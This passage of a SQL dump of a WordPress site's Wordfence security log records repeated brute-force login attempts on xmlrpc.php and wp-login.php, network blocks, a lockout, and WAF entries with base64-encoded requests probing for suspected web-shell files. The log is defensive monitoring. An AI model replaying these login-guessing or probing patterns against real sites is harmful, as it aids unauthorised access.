Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(740,0.000000,1624517640.282506,'\0\0\0\0\0\0\0\0\0\0��%:0�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(741,0.000000,1624517834.261349,'\0\0\0\0\0\0\0\0\0\0��\0',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(742,0.000000,1624517898.465206,'\0\0\0\0\0\0\0\0\0\0��2ta3',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(743,0.000000,1624518061.721151,'\0\0\0\0\0\0\0\0\0\0��N/u�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(744,0.000000,1624518141.341595,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(745,0.000000,1624520265.669911,'\0\0\0\0\0\0\0\0\0\0����x',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(746,0.000000,1624522093.051000,'\0\0\0\0\0\0\0\0\0\0����d',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(747,0.000000,1624523675.735207,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(748,0.000000,1624527292.124230,'\0\0\0\0\0\0\0\0\0\0��R��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(749,0.000000,1624530959.460672,'\0\0\0\0\0\0\0\0\0\0��C��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(750,0.000000,1624532833.862506,'\0\0\0\0\0\0\0\0\0\0���Go',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(751,0.000000,1624538286.606047,'\0\0\0\0\0\0\0\0\0\0����D',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(752,0.000000,1624539511.918357,'\0\0\0\0\0\0\0\0\0\0��ν�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(753,0.000000,1624543237.743057,'\0\0\0\0\0\0\0\0\0\0���;N�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(754,0.000000,1624544559.802183,'\0\0\0\0\0\0\0\0\0\0���A��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(755,0.000000,1624545905.172419,'\0\0\0\0\0\0\0\0\0\0��3�a',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(756,0.000000,1624547314.836343,'\0\0\0\0\0\0\0\0\0\0��H��f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(757,0.000000,1624548717.545760,'\0\0\0\0\0\0\0\0\0\0��3��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(758,0.000000,1624550251.612634,'\0\0\0\0\0\0\0\0\0\0���찍',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(759,0.000000,1624551781.638684,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(760,0.000000,1624561999.262596,'\0\0\0\0\0\0\0\0\0\0��N/ɏ',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','loginFailValidUsername',NULL,NULL),(761,0.000000,1624574270.367193,'\0\0\0\0\0\0\0\0\0\0���[p\'',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','loginFailValidUsername',NULL,NULL),(762,0.000000,1624577462.044869,'\0\0\0\0\0\0\0\0\0\0��ё?p',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(763,0.000000,1624580910.469425,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','loginFailValidUsername',NULL,NULL),(764,0.000000,1624590921.311089,'\0\0\0\0\0\0\0\0\0\0���Cl',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','loginFailValidUsername',NULL,NULL),(765,0.000000,1624599882.497269,'\0\0\0\0\0\0\0\0\0\0����l',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','loginFailValidUsername',NULL,NULL),(766,0.000000,1624606786.490948,'\0\0\0\0\0\0\0\0\0\0��\r�tN',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(767,0.000000,1624606788.584781,'\0\0\0\0\0\0\0\0\0\0��\r�tN',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(768,0.000000,1624607243.307398,'\0\0\0\0\0\0\0\0\0\0���;�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(769,0.000000,1624607252.160484,'\0\0\0\0\0\0\0\0\0\0���;�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(770,0.000000,1624607634.898487,'\0\0\0\0\0\0\0\0\0\0��Cͭ@',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(771,0.000000,1624607640.300593,'\0\0\0\0\0\0\0\0\0\0��Cͭ@',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(772,0.000000,1624610674.947675,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(773,0.000000,1624610678.564956,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(774,0.000000,1624610679.568576,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(775,0.000000,1624610680.161208,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(776,0.000000,1624610680.688866,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(777,0.000000,1624610681.213367,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(778,0.000000,1624610681.727206,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(779,0.000000,1624610682.429892,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(780,0.000000,1624610682.946892,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(781,0.000000,1624610683.492537,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(782,0.000000,1624610686.010894,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(783,0.000000,1624610686.561266,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(784,0.000000,1624610687.069532,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(785,0.000000,1624610687.619925,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(786,0.000000,1624610688.235520,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(787,0.000000,1624610688.759492,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,200,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(788,0.000000,1624610689.295109,'\0\0\0\0\0\0\0\0\0\0��Q�L',0,503,0,0,0,'https://yorkshirecricketboard.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'xuananh\'',NULL),(789,0.000000,1624614475.864508,'\0\0\0\0\0\0\0\0\0\0���H�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(790,0.000000,1624614478.774908,'\0\0\0\0\0\0\0\0\0\0���H�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(791,0.000000,1624615548.986068,'\0\0\0\0\0\0\0\0\0\0���z]c',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(792,0.000000,1624615554.735928,'\0\0\0\0\0\0\0\0\0\0���z]c',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(793,0.000000,1624615789.761345,'\0\0\0\0\0\0\0\0\0\0��ν!�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(794,0.000000,1624615791.860005,'\0\0\0\0\0\0\0\0\0\0��ν!�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(795,0.000000,1624616042.591035,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(796,0.000000,1624616043.940862,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(797,0.000000,1624616197.795952,'\0\0\0\0\0\0\0\0\0\0��Tɪ=',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(798,0.000000,1624616199.463325,'\0\0\0\0\0\0\0\0\0\0��Tɪ=',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(799,0.000000,1624616429.405868,'\0\0\0\0\0\0\0\0\0\0��T� ',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(800,0.000000,1624616430.299629,'\0\0\0\0\0\0\0\0\0\0��T� ',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(801,0.000000,1624616873.861481,'\0\0\0\0\0\0\0\0\0\0��q���',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(802,0.000000,1624617008.611348,'\0\0\0\0\0\0\0\0\0\0���ƀ�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(803,0.000000,1624617009.989443,'\0\0\0\0\0\0\0\0\0\0���ƀ�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(804,0.000000,1624618105.206663,'\0\0\0\0\0\0\0\0\0\0��\"�1�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(805,0.000000,1624618108.667855,'\0\0\0\0\0\0\0\0\0\0��\"�1�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(806,0.000000,1624618337.712344,'\0\0\0\0\0\0\0\0\0\0��-|Tz',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(807,0.000000,1624618340.540804,'\0\0\0\0\0\0\0\0\0\0��-|Tz',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(808,0.000000,1624618517.560090,'\0\0\0\0\0\0\0\0\0\0���h��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(809,0.000000,1624618518.482476,'\0\0\0\0\0\0\0\0\0\0���h��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(810,0.000000,1624618980.576991,'\0\0\0\0\0\0\0\0\0\0��\r�tN',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(811,0.000000,1624618981.981279,'\0\0\0\0\0\0\0\0\0\0��\r�tN',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(812,0.000000,1624619164.605340,'\0\0\0\0\0\0\0\0\0\0���h��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(813,0.000000,1624619167.949514,'\0\0\0\0\0\0\0\0\0\0���h��',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(814,0.000000,1624619423.380273,'\0\0\0\0\0\0\0\0\0\0��\r�tN',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(815,0.000000,1624619427.134246,'\0\0\0\0\0\0\0\0\0\0��\r�tN',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(816,0.000000,1624619648.479730,'\0\0\0\0\0\0\0\0\0\0���H�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(817,1624620595.388400,1624620594.943334,'\0\0\0\0\0\0\0\0\0\0��#�<�',0,404,0,0,0,'https://yorkshirecricketboard.org.uk/wp-includes/class-wp-page-cache.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1pbmNsdWRlcy9jbGFzcy13cC1wYWdlLWNhY2hlLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxClJlZmVyZXI6IHd3dy5nb29nbGUuY29tCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(818,1624620610.385600,1624620610.123317,'\0\0\0\0\0\0\0\0\0\0��#�<�',0,404,0,0,0,'https://yorkshirecricketboard.org.uk/wp-includes/lfx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1pbmNsdWRlcy9sZngucGhwIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKUmVmZXJlcjogd3d3Lmdvb2dsZS5jb20KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(819,0.000000,1624620751.525866,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 